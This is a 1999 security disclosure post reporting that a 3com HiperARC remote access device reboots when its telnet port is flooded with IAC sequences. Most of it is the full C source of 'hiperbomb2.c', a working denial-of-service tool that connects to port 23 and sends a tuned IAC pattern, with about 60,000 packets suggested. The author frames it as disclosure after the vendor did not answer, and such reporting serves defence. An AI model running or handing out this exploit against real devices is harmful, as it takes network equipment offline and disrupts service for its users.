3com hiperarch flaw [hiperbomb.c]

[jchapman () 1ST NET (Jonathan Chapman)]

Hello,

The attached program will reboot a 3com HiperARC.  I made an attempt to
contact 3com before posting this report, however, I received no response.
By flooding the telnet port of a 3com HiperARC using the provided program,
the HiperARC unconditionally reboots.  This program is effective over all
interfaces, including a dialup.

Regards,

Jonathan Chapman
Director of Network Security
FIRST Incorporated
jchapman () 1st net  www.1st.net


/* ---------------------------------------------------------------------
 * hiperbomb2.c - Reboots HiperARC faster.
 * ---------------------------------------------------------------------
 * (c) 1999 - Jonathan Chapman <jchapman () 1st net>
 * ---------------------------------------------------------------------
 * Sends a high volume of IACs which eventually leads to a reboot of the
 * HiperARC.  Brief testing indicated that this problem is most likely 
 * specific to sending IACs rather than any other type of data.  Further
 * research has shown that specific IAC patterns are more likely to cause
 * a reboot.  In this example I use one of the most efficient combinations
 * I have discovered.  Through my testing it usually required at least
 * 60,000 packets to cause the HiperARC to reboot.
 * ---------------------------------------------------------------------
 */


#include <stdio.h>
#include <stdarg.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

char *chassis;
int sockfd, num_of_tries;

void connect_to_chassis(char *name)
{
        struct hostent *host;
        struct sockaddr_in remote;

        host = gethostbyname(name);

        if(!host) {
        fprintf(stderr, "Cannot resolve host %s.\n", name);
        exit(3);
        }

        sockfd = socket(AF_INET, SOCK_STREAM, 0);

        if(sockfd < 0) {
        fprintf(stderr, "Cannot obtain descriptor.\n");
        exit(4);
        }

        remote.sin_family = AF_INET;
        remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
        remote.sin_port = htons(23);

        connect(sockfd, (struct sockaddr *)&remote, sizeof(remote));

        return;
}

void send_iacs()
{
        unsigned char reply[3] = {254, 36, 185};
        unsigned int k;

        for(k = 0; k < num_of_tries; k++) {
        write(sockfd, reply, 3);
        }
}

int main(int ac, char **av)
{

        if(ac < 3) {
        fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
        fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
        exit(2);
        }

        chassis = av[1];
        num_of_tries = atoi(av[2]);

        fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n", 
                chassis, num_of_tries);
        connect_to_chassis(chassis);
        send_iacs();
        fprintf(stderr, "Attack complete.\n");

        exit(0);
}